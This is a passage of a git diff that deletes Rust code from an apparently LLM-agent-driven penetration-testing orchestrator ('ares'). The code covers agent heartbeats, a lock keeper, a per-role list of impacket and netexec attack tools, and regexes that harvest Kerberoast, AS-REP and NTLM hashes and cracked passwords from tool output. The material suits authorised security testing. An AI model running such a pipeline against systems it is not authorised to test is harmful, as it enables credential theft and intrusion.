crate::task_queue::TaskQueue; - -// --------------------------------------------------------------------------- -// Agent registry -// --------------------------------------------------------------------------- - -/// Live state for a registered agent. -#[derive(Debug, Clone)] -#[allow(dead_code)] -pub struct AgentState { - pub name: String, - pub role: String, - pub status: String, - pub last_heartbeat: DateTime, - pub current_task: Option, -} - -/// Registry of known agents with their health state. -#[derive(Debug, Clone)] -pub struct AgentRegistry { - agents: Arc>>, -} - -impl AgentRegistry { - pub fn new() -> Self { - Self { - agents: Arc::new(tokio::sync::Mutex::new(HashMap::new())), - } - } - - /// Register an agent (or update it if already known). - #[allow(dead_code)] - pub async fn register(&self, name: &str, role: &str) { - let mut agents = self.agents.lock().await; - agents - .entry(name.to_string()) - .and_modify(|a| { - a.role = role.to_string(); - }) - .or_insert_with(|| AgentState { - name: name.to_string(), - role: role.to_string(), - status: "idle".to_string(), - last_heartbeat: Utc::now(), - current_task: None, - }); - } - - /// Update heartbeat data from Redis. - pub async fn update_heartbeat( - &self, - name: &str, - status: &str, - current_task: Option<&str>, - timestamp: DateTime, - ) { - let mut agents = self.agents.lock().await; - if let Some(agent) = agents.get_mut(name) { - agent.status = status.to_string(); - agent.current_task = current_task.map(|s| s.to_string()); - agent.last_heartbeat = timestamp; - } - } - - /// Return agents whose heartbeat is older than `timeout`. - pub async fn stale_agents(&self, timeout: std::time::Duration) -> Vec { - let agents = self.agents.lock().await; - let cutoff = Utc::now() - chrono::Duration::from_std(timeout).unwrap_or_default(); - agents - .values() - .filter(|a| a.last_heartbeat < cutoff && a.status != "offline") - .cloned() - .collect() - } - - /// Mark an agent offline. - pub async fn mark_offline(&self, name: &str) { - let mut agents = self.agents.lock().await; - if let Some(agent) = agents.get_mut(name) { - agent.status = "offline".to_string(); - } - } - - /// List all registered agent names (for heartbeat sweep). - pub async fn agent_names(&self) -> Vec { - let agents = self.agents.lock().await; - agents.keys().cloned().collect() - } -} - -// --------------------------------------------------------------------------- -// Lock keeper — independent task that only refreshes the operation lock -// --------------------------------------------------------------------------- - -/// Spawn a dedicated task that extends the operation lock TTL every -/// `heartbeat_interval`. This is intentionally decoupled from the heartbeat -/// sweep so that a slow/hanging Redis call in the sweep cannot block lock -/// refresh and cause the lock to expire. -/// -/// Creates its own Redis connection to avoid contention with the main -/// connection pool used for tool dispatch and result polling. -pub fn spawn_lock_keeper( - queue: TaskQueue, - config: Arc, - mut shutdown: watch::Receiver, -) -> tokio::task::JoinHandle<()> { - tokio::spawn(async move { - // Create a dedicated Redis connection for the lock keeper so that - // EXPIRE commands are not queued behind heavy BRPOP/LPUSH traffic - // on the shared connection manager. - let dedicated_queue = match TaskQueue::connect(&config.redis_url).await { - Ok(q) => { - info!("Lock keeper using dedicated Redis connection"); - q - } - Err(e) => { - warn!(err = %e, "Lock keeper failed to create dedicated connection, falling back to shared"); - queue.clone() - } - }; - - let mut interval = tokio::time::interval(config.heartbeat_interval); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => { - debug!("Lock keeper shutting down"); - break; - } - } - - // Wrap in a timeout so a hung Redis connection can't block us - // for longer than the lock TTL. - let extend_timeout = std::time::Duration::from_secs(10); - let result = tokio::time::timeout( - extend_timeout, - dedicated_queue.extend_lock(&config.operation_id, config.lock_ttl), - ) - .await; - - match result { - Ok(Ok(true)) => {} // Lock TTL refreshed - Ok(Ok(false)) => { - // Lock key disappeared — re-acquire it - warn!( - operation_id = %config.operation_id, - "Lock key missing, attempting re-acquisition" - ); - match dedicated_queue - .try_acquire_lock(&config.operation_id, config.lock_ttl) - .await - { - Ok(true) => info!( - operation_id = %config.operation_id, - "Operation lock re-acquired" - ), - Ok(false) => warn!( - operation_id = %config.operation_id, - "Lock re-acquisition failed — another holder exists" - ), - Err(e) => warn!(err = %e, "Lock re-acquisition error"), - } - } - Ok(Err(e)) => { - warn!(err = %e, "Failed to extend operation lock"); - } - Err(_) => { - warn!("Lock extend timed out (Redis unresponsive?)"); - } - } - } - }) -} - -// --------------------------------------------------------------------------- -// Heartbeat monitor task -// --------------------------------------------------------------------------- - -/// Spawn a background task that periodically: -/// 1. Reads heartbeat keys from Redis for all known agents -/// 2. Marks stale agents as offline -/// 3. Cleans up stale tasks -/// -/// Lock refresh is handled by the separate `spawn_lock_keeper` task. -/// -/// Runs until `shutdown` is signalled. -pub fn spawn_heartbeat_monitor( - queue: TaskQueue, - registry: AgentRegistry, - tracker: ActiveTaskTracker, - config: Arc, - mut shutdown: watch::Receiver, -) -> tokio::task::JoinHandle<()> { - tokio::spawn(async move { - let mut interval = tokio::time::interval(config.heartbeat_interval); - let mut consecutive_failures: u32 = 0; - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => { - info!("Heartbeat monitor shutting down"); - break; - } - } - - if let Err(e) = run_heartbeat_sweep(&queue, ®istry, &config).await { - consecutive_failures += 1; - warn!( - attempt = consecutive_failures, - err = %e, - "Heartbeat sweep failed" - ); - // Exponential backoff on repeated failures - let delay = std::time::Duration::from_secs(std::cmp::min( - 15, - (consecutive_failures as u64) * 5, - )); - tokio::time::sleep(delay).await; - continue; - } - consecutive_failures = 0; - - // Clean up stale tasks (salvage any pending results first) - if let Err(e) = cleanup_stale_tasks(&tracker, &queue, &config).await { - warn!(err = %e, "Stale task cleanup failed"); - } - } - }) -} - -/// Read heartbeats from Redis and update the registry. -async fn run_heartbeat_sweep( - queue: &TaskQueue, - registry: &AgentRegistry, - config: &OrchestratorConfig, -) -> Result<()> { - let names = registry.agent_names().await; - for name in &names { - match queue.get_heartbeat(name).await { - Ok(Some(hb)) => { - let ts = DateTime::parse_from_rfc3339(&hb.timestamp) - .map(|dt| dt.with_timezone(&Utc)) - .unwrap_or_else(|_| Utc::now()); - registry - .update_heartbeat(name, &hb.status, hb.current_task.as_deref(), ts) - .await; - } - Ok(None) => { - debug!(agent = %name, "No heartbeat key in Redis"); - } - Err(e) => { - warn!(agent = %name, err = %e, "Failed to read heartbeat"); - } - } - } - - // Mark stale agents offline - let stale = registry.stale_agents(config.heartbeat_timeout).await; - for agent in &stale { - warn!( - agent = %agent.name, - last_hb = %agent.last_heartbeat, - "Agent heartbeat stale — marking offline" - ); - registry.mark_offline(&agent.name).await; - } - - Ok(()) -} - -/// Remove tasks that have been active longer than the configured stale timeout. -/// -/// Before removing, checks Redis for unclaimed results and logs a warning so -/// we know the result consumer missed them. (The real-time discovery push in -/// `RedisToolDispatcher` ensures discoveries still reach state.) -async fn cleanup_stale_tasks( - tracker: &ActiveTaskTracker, - queue: &TaskQueue, - config: &OrchestratorConfig, -) -> Result<()> { - let llm_count = tracker.llm_task_count().await; - let hard_cap = config.hard_cap(); - - // Use shorter timeout when at hard cap to break deadlock faster - let effective_timeout = if llm_count >= hard_cap { - config.stale_task_timeout / 2 - } else { - config.stale_task_timeout - }; - - let stale = tracker.stale_tasks(effective_timeout).await; - for task in &stale { - // Check if there's an unclaimed result sitting in Redis - let has_unclaimed = queue - .has_pending_result(&task.task_id) - .await - .unwrap_or(false); - - if has_unclaimed { - warn!( - task_id = %task.task_id, - role = %task.role, - age_secs = task.submitted_at.elapsed().as_secs(), - "Removing stale task with UNCLAIMED result in Redis (result consumer missed it)" - ); - } else { - warn!( - task_id = %task.task_id, - role = %task.role, - age_secs = task.submitted_at.elapsed().as_secs(), - "Removing stale task" - ); - } - tracker.remove(&task.task_id).await; - } - - if !stale.is_empty() { - info!( - removed = stale.len(), - llm_count, hard_cap, "Stale task cleanup complete" - ); - } - - Ok(()) -} - -// --------------------------------------------------------------------------- -// Pre-flight tool check -// --------------------------------------------------------------------------- - -/// Critical tools per worker role. If any of these are missing, operations -/// will be severely degraded. -pub(crate) const CRITICAL_TOOLS: &[(&str, &[&str])] = &[ - ("recon", &["nmap", "netexec"]), - ( - "credential_access", - &[ - "impacket-GetUserSPNs", - "impacket-GetNPUsers", - "impacket-secretsdump", - ], - ), - ("privesc", &["impacket-findDelegation", "impacket-getST"]), - ( - "lateral", - &[ - "impacket-psexec", - "impacket-smbexec", - "impacket-secretsdump", - ], - ), -]; - -/// Query Redis for each worker's tool inventory and report any missing -/// critical tools. Returns a list of (role, missing_tools) pairs. -pub(crate) async fn preflight_tool_check( - conn: &mut redis::aio::ConnectionManager, -) -> Vec<(String, Vec)> { - use redis::AsyncCommands; - - let mut problems = Vec::new(); - - for &(role, critical) in CRITICAL_TOOLS { - let agent_key = format!("ares:tools:ares-{role}-agent"); - let available: Vec = match conn.get::<_, Option>(&agent_key).await { - Ok(Some(json)) => serde_json::from_str(&json).unwrap_or_default(), - _ => { - // No inventory published yet — worker may not have started - warn!( - role = role, - "No tool inventory found — worker may not be running" - ); - problems.push(( - role.to_string(), - critical.iter().map(|s| s.to_string()).collect(), - )); - continue; - } - }; - - let missing: Vec = critical - .iter() - .filter(|&&tool| !available.iter().any(|a| a == tool)) - .map(|s| s.to_string()) - .collect(); - - if !missing.is_empty() { - problems.push((role.to_string(), missing)); - } - } - - problems -} - -#[cfg(test)] -mod tests { - use super::*; - - #[tokio::test] - async fn register_and_list() { - let r = AgentRegistry::new(); - r.register("ares-recon-0", "recon").await; - r.register("ares-lateral-0", "lateral").await; - let mut names = r.agent_names().await; - names.sort(); - assert_eq!(names, vec!["ares-lateral-0", "ares-recon-0"]); - } - - #[tokio::test] - async fn heartbeat_update_prevents_staleness() { - let r = AgentRegistry::new(); - r.register("a1", "recon").await; - r.update_heartbeat("a1", "busy", Some("task-42"), Utc::now()) - .await; - assert!(r - .stale_agents(std::time::Duration::from_secs(60)) - .await - .is_empty()); - } - - #[tokio::test] - async fn stale_agent_detected() { - let r = AgentRegistry::new(); - r.register("old", "recon").await; - let old_ts = Utc::now() - chrono::Duration::seconds(120); - r.update_heartbeat("old", "idle", None, old_ts).await; - let stale = r.stale_agents(std::time::Duration::from_secs(60)).await; - assert_eq!(stale.len(), 1); - assert_eq!(stale[0].name, "old"); - } - - #[tokio::test] - async fn mark_offline_excludes_from_stale() { - let r = AgentRegistry::new(); - r.register("dead", "recon").await; - let old_ts = Utc::now() - chrono::Duration::seconds(300); - r.update_heartbeat("dead", "idle", None, old_ts).await; - r.mark_offline("dead").await; - assert!(r - .stale_agents(std::time::Duration::from_secs(60)) - .await - .is_empty()); - } - - #[tokio::test] - async fn re_register_updates_role() { - let r = AgentRegistry::new(); - r.register("a1", "recon").await; - r.register("a1", "lateral").await; - let agents = r.agents.lock().await; - assert_eq!(agents.get("a1").unwrap().role, "lateral"); - } -} diff --git a/ares-orchestrator/src/output_extraction/hashes.rs b/ares-orchestrator/src/output_extraction/hashes.rs deleted file mode 100644 index 11ac84ea..00000000 --- a/ares-orchestrator/src/output_extraction/hashes.rs +++ /dev/null @@ -1,308 +0,0 @@ -use regex::Regex; -use std::sync::LazyLock; - -use ares_core::models::{Credential, Hash}; - -use super::{is_valid_credential, make_credential}; - -static RE_TGS_HASH: LazyLock = LazyLock::new(|| { - Regex::new(r"(\$krb5tgs\$\d+\$\*([^$*]+)\$([^$*]+)\$[^$]+\$[a-fA-F0-9$]+)").unwrap() -}); - -static RE_ASREP_HASH: LazyLock = - LazyLock::new(|| Regex::new(r"(\$krb5asrep\$\d+\$([^@:]+)@([^:]+):[a-fA-F0-9$]+)").unwrap()); - -// domain\user:rid:lmhash:nthash::: -static RE_NTLM_DOMAIN: LazyLock = LazyLock::new(|| { - Regex::new(r"([^\\:\s]+)\\([^:\\]+):\d+:([a-fA-F0-9]{32}):([a-fA-F0-9]{32}):::").unwrap() -}); - -// user:rid:lmhash:nthash::: -static RE_NTLM_PLAIN: LazyLock = LazyLock::new(|| { - Regex::new(r"^([^:\\$\s]+):(\d+):([a-fA-F0-9]{32}):([a-fA-F0-9]{32}):::").unwrap() -}); - -// Partial NTLM line (line-wrapped secretsdump) -static RE_NTLM_PARTIAL: LazyLock = - LazyLock::new(|| Regex::new(r"^[^:\s]+:\d+:[a-fA-F0-9]{32}:[a-fA-F0-9]+$").unwrap()); - -static RE_NTLM_CONTINUATION: LazyLock = - LazyLock::new(|| Regex::new(r"^[a-fA-F0-9]+:::$").unwrap()); - -pub fn extract_hashes(output: &str, default_domain: &str) -> Vec { - let mut hashes = Vec::new(); - let mut seen = std::collections::HashSet::new(); - - // First pass: unwrap line-wrapped NTLM hashes - let lines: Vec<&str> = output.lines().collect(); - let mut unwrapped: Vec = Vec::new(); - let mut i = 0; - while i < lines.len() { - let line = lines[i].trim(); - if RE_NTLM_PARTIAL.is_match(line) && i + 1 < lines.len() { - let next = lines[i + 1].trim(); - if RE_NTLM_CONTINUATION.is_match(next) { - unwrapped.push(format!("{}{}", line, next)); - i += 2; - continue; - } - } - unwrapped.push(line.to_string()); - i += 1; - } - - for line in &unwrapped { - // Priority: TGS → AS-REP → NTLM (first match wins) - - // TGS (Kerberoast) - if let Some(caps) = RE_TGS_HASH.captures(line) { - let hash_value = caps.get(1).unwrap().as_str(); - let username = caps.get(2).unwrap().as_str(); - let domain = caps.get(3).unwrap().as_str(); - let key = format!("tgs:{}@{}", username.to_lowercase(), domain.to_lowercase()); - if seen.insert(key) { - hashes.push(Hash { - id: uuid::Uuid::new_v4().to_string(), - username: username.to_string(), - hash_value: hash_value.to_string(), - hash_type: "kerberoast".to_string(), - domain: domain.to_string(), - cracked_password: None, - source: "output_extraction".to_string(), - discovered_at: Some(chrono::Utc::now()), - parent_id: None, - attack_step: 0, - aes_key: None, - }); - } - continue; - } - - // AS-REP - if let Some(caps) = RE_ASREP_HASH.captures(line) { - let hash_value = caps.get(1).unwrap().as_str(); - let username = caps.get(2).unwrap().as_str(); - let domain = caps.get(3).unwrap().as_str(); - let key = format!( - "asrep:{}@{}", - username.to_lowercase(), - domain.to_lowercase() - ); - if seen.insert(key) { - hashes.push(Hash { - id: uuid::Uuid::new_v4().to_string(), - username: username.to_string(), - hash_value: hash_value.to_string(), - hash_type: "asrep".to_string(), - domain: domain.to_string(), - cracked_password: None, - source: "output_extraction".to_string(), - discovered_at: Some(chrono::Utc::now()), - parent_id: None, - attack_step: 0, - aes_key: None, - }); - } - continue; - } - - // NTLM with domain prefix - if let Some(caps) = RE_NTLM_DOMAIN.captures(line) { - let domain = caps.get(1).unwrap().as_str(); - let username = caps.get(2).unwrap().as_str(); - let lm = caps.get(3).unwrap().as_str(); - let nt = caps.get(4).unwrap().as_str(); - let hash_value = format!("{lm}:{nt}"); - let key = format!("ntlm:{}@{}", username.to_lowercase(), domain.to_lowercase()); - if seen.insert(key) { - hashes.push(Hash { - id: uuid::Uuid::new_v4().to_string(), - username: username.to_string(), - hash_value, - hash_type: "ntlm".to_string(), - domain: domain.to_string(), - cracked_password: None, - source: "output_extraction".to_string(), - discovered_at: Some(chrono::Utc::now()), - parent_id: None, - attack_step: 0, - aes_key: None, - }); - } - continue; - } - - // NTLM without domain prefix - if let Some(caps) = RE_NTLM_PLAIN.captures(line) { - let username = caps.get(1).unwrap().as_str(); - let lm = caps.get(3).unwrap().as_str(); - let nt = caps.get(4).unwrap().as_str(); - let hash_value = format!("{lm}:{nt}"); - let key = format!( - "ntlm:{}@{}", - username.to_lowercase(), - default_domain.to_lowercase() - ); - if seen.insert(key) { - hashes.push(Hash { - id: uuid::Uuid::new_v4().to_string(), - username: username.to_string(), - hash_value, - hash_type: "ntlm".to_string(), - domain: default_domain.to_string(), - cracked_password: None, - source: "output_extraction".to_string(), - discovered_at: Some(chrono::Utc::now()), - parent_id: None, - attack_step: 0, - aes_key: None, - }); - } - } - } - - hashes -} - -/// Hashcat cracked TGS: $krb5tgs$23$*user$DOMAIN$spn*$hash:plaintext -static RE_CRACKED_TGS: LazyLock = LazyLock::new(|| { - Regex::new(r"\$krb5tgs\$\d+\$\*([^$*]+)\$([^$*]+)\$[^*]+\*\$[a-fA-F0-9$]+:(.+)$").unwrap() -}); - -/// Cracked AS-REP: $krb5asrep$23$user@DOMAIN:hash:plaintext (hashcat) -/// or $krb5asrep$23$user@DOMAIN:plaintext (john --show, no hex section) -static RE_CRACKED_ASREP: LazyLock = LazyLock::new(|| { - Regex::new(r"\$krb5asrep\$\d+\$([^@:]+)@([^:]+):(?:[a-fA-F0-9$]+:)?(.+)$").unwrap() -}); - -/// John --show output: user:plaintext (with optional trailing :::... fields) -/// Only matches lines that look like john --show format — username followed by -/// password, then optional RID and empty LM/NT fields. -static RE_JOHN_SHOW: LazyLock = LazyLock::new(|| { - Regex::new(r"^([^:\s$][^:]*):([^:]+):\d*:(?:[a-fA-F0-9]*:){0,3}:*\s*$").unwrap() -}); - -/// John --show unknown user: ?:plaintext (john can't determine username from TGS hashes) -static RE_JOHN_UNKNOWN_USER: LazyLock = LazyLock::new(|| Regex::new(r"^\?:(.+)$").unwrap()); - -/// Extract username/domain from a TGS hash in the output text. -static RE_TGS_HASH_USER: LazyLock = - LazyLock::new(|| Regex::new(r"\$krb5tgs\$\d+\$\*([^$*]+)\$([^$*]+)").unwrap()); - -pub fn extract_cracked_passwords(output: &str, default_domain: &str) -> Vec { - let mut credentials = Vec::new(); - let mut seen = std::collections::HashSet::new(); - - // Detect john --show context (john outputs "N password hash cracked") - let is_john_output = - output.contains("password hash cracked") || output.contains("password hashes cracked"); - - for line in output.lines() { - let stripped = line.trim(); - if stripped.is_empty() { - continue; - } - - // Hashcat cracked TGS (Kerberoast) - if let Some(caps) = RE_CRACKED_TGS.captures(stripped) { - let username = caps.get(1).unwrap().as_str(); - let domain = caps.get(2).unwrap().as_str(); - let password = caps.get(3).unwrap().as_str(); - if is_valid_credential(username, password) { - let key = format!( - "cracked:{}@{}", - username.to_lowercase(), - domain.to_lowercase() - ); - if seen.insert(key) { - credentials.push(make_credential( - username, - password, - domain, - "cracked:hashcat", - )); - } - } - continue; - } - - // Hashcat cracked AS-REP - if let Some(caps) = RE_CRACKED_ASREP.captures(stripped) { - let username = caps.get(1).unwrap().as_str(); - let domain = caps.get(2).unwrap().as_str(); - let password = caps.get(3).unwrap().as_str(); - if is_valid_credential(username, password) { - let key = format!( - "cracked:{}@{}", - username.to_lowercase(), - domain.to_lowercase() - ); - if seen.insert(key) { - credentials.push(make_credential( - username, - password, - domain, - "cracked:hashcat", - )); - } - } - continue; - } - - // John --show output (only if we detected john context) - if is_john_output { - // John --show unknown user: ?:password (TGS hashes) - // Try to extract username from a $krb5tgs$ line in the same output. - if let Some(caps) = RE_JOHN_UNKNOWN_USER.captures(stripped) { - let password = caps.get(1).unwrap().as_str().trim(); - if is_valid_credential("?", password) { - // Scan output for a TGS hash line to get username/domain - if let Some(tgs_caps) = RE_TGS_HASH_USER.captures(output) { - let username = tgs_caps.get(1).unwrap().as_str(); - let domain = tgs_caps.get(2).unwrap().as_str(); - let key = format!( - "cracked:{}@{}", - username.to_lowercase(), - domain.to_lowercase() - ); - if seen.insert(key) { - credentials.push(make_credential( - username, - password, - domain, - "cracked:john", - )); - } - } - } - continue; - } - - if let Some(caps) = RE_JOHN_SHOW.captures(stripped) { - let username = caps.get(1).unwrap().as_str(); - let password = caps.get(2).unwrap().as_str(); - // Skip john summary lines - if username.chars().all(|c| c.is_ascii_digit()) { - continue; - } - if is_valid_credential(username, password) { - let key = format!( - "cracked:{}@{}", - username.to_lowercase(), - default_domain.to_lowercase() - ); - if seen.insert(key) { - credentials.push(make_credential( - username, - password, - default_domain, - "cracked:john", - )); - } - } - } - } - } - - credentials -} diff --git a/ares-orchestrator/src/output_extraction/hosts.rs b/ares-orchestrator/src/output_extraction/hosts.rs deleted file mode 100644 index b8cb463d..00000000 --- a/ares-orchestrator/src/output_extraction/hosts.rs +++ /dev/null @@ -1,108 +0,0 @@ -use regex::Regex; -use std::sync::LazyLock; - -use ares_core::models::Host; - -static RE_SMB_BANNER: LazyLock = LazyLock::new(|| { - Regex::new(r"SMB\s+(\d{1,3}(?:\.\d{1,3}){3})\s+\d+\s+([A-Za-z0-9_.\-]+)\s+\[\*\]\s+(.+)") - .unwrap() -}); - -static RE_SMB_BANNER_NAME: LazyLock = - LazyLock::new(|| Regex::new(r"\(name:([^)]+)\)").unwrap()); - -static RE_SMB_BANNER_DOMAIN: LazyLock = - LazyLock::new(|| Regex::new(r"\(domain:([^)]+)\)").unwrap()); - -static RE_SMB_BANNER_OS: LazyLock = - LazyLock::new(|| Regex::new(r"^\s*([^(]+?)\s+\(name:").unwrap()); - -static RE_SMB_SIMPLE: LazyLock = LazyLock::new(|| { - Regex::new(r"^SMB\s+(\d{1,3}(?:\.\d{1,3}){3})\s+\d+\s+([A-Za-z0-9_\-]+)\s+").unwrap() -}); - -pub fn extract_hosts(output: &str) -> Vec { - let mut hosts = Vec::new(); - let mut seen = std::collections::HashSet::new(); - - for line in output.lines() { - let stripped = line.trim(); - - // Banner line with OS info: SMB IP PORT HOST [*] details - if let Some(caps) = RE_SMB_BANNER.captures(stripped) { - let ip = caps.get(1).unwrap().as_str().to_string(); - if !seen.insert(ip.clone()) { - continue; - } - let details = caps.get(3).unwrap().as_str(); - let netbios_name = RE_SMB_BANNER_NAME - .captures(details) - .map(|c| c.get(1).unwrap().as_str().to_string()) - .unwrap_or_default(); - let domain = RE_SMB_BANNER_DOMAIN - .captures(details) - .map(|c| { - // netexec appends trailing artifacts like "0." — strip them - c.get(1) - .unwrap() - .as_str() - .trim_end_matches("0.") - .trim_end_matches('.') - .to_string() - }) - .unwrap_or_default(); - let os = RE_SMB_BANNER_OS - .captures(details) - .map(|c| c.get(1).unwrap().as_str().trim().to_string()) - .unwrap_or_default(); - - let hostname = - if !netbios_name.is_empty() && !domain.is_empty() && !netbios_name.contains('.') { - format!("{}.{}", netbios_name.to_lowercase(), domain.to_lowercase()) - } else { - netbios_name - }; - - let is_dc = details.contains("(signing:True)"); - let mut roles = Vec::new(); - if is_dc { - roles.push("AD DC".to_string()); - } - - hosts.push(Host { - ip, - hostname, - os, - roles, - services: vec![], - is_dc, - owned: false, - }); - continue; - } - - // Fallback simple line - if let Some(caps) = RE_SMB_SIMPLE.captures(stripped) { - let ip = caps.get(1).unwrap().as_str().to_string(); - let host_col = caps.get(2).unwrap().as_str(); - // Skip table header words - let skip = ["share", "name", "permissions", "remark"]; - if skip.contains(&host_col.to_lowercase().as_str()) { - continue; - } - if seen.insert(ip.clone()) { - hosts.push(Host { - ip, - hostname: host_col.to_string(), - os: String::new(), - roles: vec![], - services: vec![], - is_dc: false, - owned: false, - }); - } - } - } - - hosts -} diff --git a/ares-orchestrator/src/output_extraction/mod.rs b/ares-orchestrator/src/output_extraction/mod.rs deleted file mode 100644 index e428dcf2..00000000 --- a/ares-orchestrator/src/output_extraction/mod.rs +++ /dev/null @@ -1,160 +0,0 @@ -//! Regex-based extraction of discoveries from raw tool output text. -//! -//! This is the orchestrator-level safety net that mirrors Python's -//! `_process_output_text()` in `result_processing.py`. It parses raw -//! text from task results to catch credentials, hashes, hosts, shares, -//! and users that the per-tool parsers or LLM may have missed. -//! -//! The per-tool parsers in `ares_tools::parsers` are the primary extraction -//! mechanism (they run at tool-call time). This module runs on the full task -//! result text as a secondary pass. - -mod hashes; -mod hosts; -mod passwords; -mod shares; -#[cfg(test)] -mod tests; -mod users; - -use regex::Regex; -use std::sync::LazyLock; - -use ares_core::models::{Credential, Hash, Host, Share, User}; - -pub use hashes::{extract_cracked_passwords, extract_hashes}; -pub use hosts::extract_hosts; -pub use passwords::extract_plaintext_passwords; -pub use shares::extract_shares; -pub use users::extract_users; - -/// Strip ANSI escape sequences from text (e.g., color codes from tool output). -pub(crate) fn strip_ansi(s: &str) -> String { - static RE: LazyLock = LazyLock::new(|| Regex::new(r"\x1b\[[0-9;]*m").unwrap()); - RE.replace_all(s, "").into_owned() -} - -/// All discoveries extracted from raw output text. -#[derive(Debug, Default)] -pub struct TextExtractions { - pub credentials: Vec, - pub hashes: Vec, - pub hosts: Vec, - pub users: Vec, - pub shares: Vec, -} - -impl TextExtractions { - pub fn is_empty(&self) -> bool { - self.credentials.is_empty() - && self.hashes.is_empty() - && self.hosts.is_empty() - && self.users.is_empty() - && self.shares.is_empty() - } -} - -/// Extract all discoverable entities from raw output text. -/// -/// Runs all extraction passes and returns the combined results. -pub fn extract_from_output_text(output: &str, default_domain: &str) -> TextExtractions { - let mut result = TextExtractions::default(); - if output.is_empty() { - return result; - } - - result.hosts = extract_hosts(output); - result.users = extract_users(output, default_domain); - result.credentials = extract_plaintext_passwords(output, default_domain); - result.shares = extract_shares(output); - result.hashes = extract_hashes(output, default_domain); - - let cracked = extract_cracked_passwords(output, default_domain); - result.credentials.extend(cracked); - - result -} - -/// Validate a credential pair — matches Python's add_credential() rejection checks. -pub(crate) fn is_valid_credential(username: &str, password: &str) -> bool { - if username.is_empty() || password.is_empty() { - return false; - } - if username.contains('/') || username.contains('\\') || username.ends_with(".txt") { - return false; - } - if password.contains('/') || password.contains('\\') || password.ends_with(".txt") { - return false; - } - let user_lower = username.to_lowercase(); - if matches!(user_lower.as_str(), "(none)" | "none" | "null" | "(null)") { - return false; - } - let user_upper = username.to_uppercase(); - if user_upper.starts_with("EVIL") && user_upper.ends_with('$') { - let middle = &user_upper[4..user_upper.len() - 1]; - if middle.chars().all(|c| c.is_ascii_digit()) { - return false; - } - } - let pw_lower = password.to_lowercase(); - if matches!( - pw_lower.as_str(), - "(null)" - | "(null:null)" - | "*blank*" - | "" - | "n/a" - | "[+]" - | "[-]" - | "password" - | "no" - | "yes" - | "true" - | "false" - | "unknown" - | "none" - | "null" - | "fail" - | "failed" - | "error" - | "status" - | "success" - | "enabled" - | "disabled" - | "required" - | "allowed" - | "denied" - ) { - return false; - } - if password.len() < 3 { - return false; - } - if password.len() > 128 { - return false; - } - if password.len() > 40 && password.chars().all(|c| c.is_ascii_hexdigit() || c == '$') { - return false; - } - true -} - -pub(crate) fn make_credential( - username: &str, - password: &str, - domain: &str, - source: &str, -) -> Credential { - Credential { - id: uuid::Uuid::new_v4().to_string(), - username: username.to_string(), - password: password.to_string(), - domain: domain.to_string(), - source: source.to_string(), - discovered_at: Some(chrono::Utc::now()), - is_admin: false, - parent_id: None, - attack_step: 0, - } -} diff --git a/ares-orchestrator/src/output_extraction/passwords.rs b/ares-orchestrator/src/output_extraction/passwords.rs deleted file mode 100644 index 2d06a50a..00000000 --- a/ares-orchestrator/src/output_extraction/passwords.rs +++ /dev/null @@ -1,178 +0,0 @@ -use regex::Regex; -use std::sync::LazyLock; - -use ares_core::models::Credential; - -use super::users::{RE_ACCOUNT, RE_DOMAIN_BACKSLASH, RE_UPN, RE_USER_BRACKET}; -use super::{is_valid_credential, make_credential}; - -static RE_DEFAULT_PASSWORD_CRED: LazyLock = - LazyLock::new(|| Regex::new(r"^([^\\]+)\\([^:]+):(.+)$").unwrap()); - -static RE_PASSWORD_VALUE: LazyLock = - LazyLock::new(|| Regex::new(r"(?i)Password\s*:\s*([^\s)]+)").unwrap()); - -static RE_SMB_TIMESTAMP_PASSWORD: LazyLock = LazyLock::new(|| { - Regex::new( - r"SMB\s+\S+\s+\d+\s+\S+\s+([A-Za-z0-9_.\-]+)\s+\d{4}-\d{2}-\d{2}.*(?i)Password\s*:\s*", - ) - .unwrap() -}); - -/// General nxc SMB line with a username field followed eventually by "Password": -/// `SMB IP PORT HOST username ... Password : xxx` -/// Broader than RE_SMB_TIMESTAMP_PASSWORD — doesn't require a timestamp. -static RE_SMB_LINE_PASSWORD: LazyLock = LazyLock::new(|| { - Regex::new(r"SMB\s+\S+\s+\d+\s+\S+\s+([A-Za-z0-9_.\-]+)\s+.*(?i)Password\s*:\s*").unwrap() -}); - -/// Netexec [+] success line: `SMB IP PORT HOST [+] DOMAIN\user:password` -static RE_NETEXEC_SUCCESS: LazyLock = LazyLock::new(|| { - Regex::new(r"\[\+\]\s+([A-Za-z0-9_.\-]+)\\([A-Za-z0-9_.\-$]+):([^\s(]+)").unwrap() -}); - -pub fn extract_plaintext_passwords(output: &str, default_domain: &str) -> Vec { - let mut credentials = Vec::new(); - let mut seen = std::collections::HashSet::new(); - - const FAILURE_MARKERS: &[&str] = &[ - "STATUS_LOGON_FAILURE", - "STATUS_PASSWORD_EXPIRED", - "STATUS_PASSWORD_MUST_CHANGE", - "STATUS_ACCOUNT_LOCKED_OUT", - "STATUS_ACCOUNT_DISABLED", - "STATUS_ACCOUNT_RESTRICTION", - "STATUS_NO_LOGON_SERVERS", - "STATUS_ACCESS_DENIED", - "STATUS_INVALID_LOGON_HOURS", - "STATUS_INVALID_WORKSTATION", - "LOGON FAILURE", - "LOGON_FAILURE", - "ACCESS_DENIED", - // Guest fallback — SMB accepted the connection but mapped it to the - // built-in Guest account. The supplied password was NOT validated. - "(GUEST)", - ]; - - for line in output.lines() { - let stripped = line.trim(); - if !stripped.contains("[+]") { - continue; - } - let upper = stripped.to_uppercase(); - if FAILURE_MARKERS.iter().any(|m| upper.contains(m)) { - continue; - } - if let Some(caps) = RE_NETEXEC_SUCCESS.captures(stripped) { - let domain = caps.get(1).unwrap().as_str().to_string(); - let user = caps.get(2).unwrap().as_str().to_string(); - let pass = caps - .get(3) - .unwrap() - .as_str() - .trim_end_matches("(Pwn3d!)") - .trim() - .to_string(); - if is_valid_credential(&user, &pass) { - let key = format!("{}\\{}:{}", domain, user, pass); - if seen.insert(key) { - credentials.push(make_credential(&user, &pass, &domain, "netexec_auth")); - } - } - } - } - let mut current_domain = default_domain.to_string(); - let mut expecting_default_password = false; - - let lines: Vec<&str> = output.lines().collect(); - for line in &lines { - let stripped = line.trim(); - - // DefaultPassword block - if stripped.contains("[*] DefaultPassword") { - expecting_default_password = true; - continue; - } - - if expecting_default_password { - expecting_default_password = false; - if let Some(caps) = RE_DEFAULT_PASSWORD_CRED.captures(stripped) { - let domain = caps.get(1).unwrap().as_str().to_string(); - let user = caps.get(2).unwrap().as_str().to_string(); - let pass = 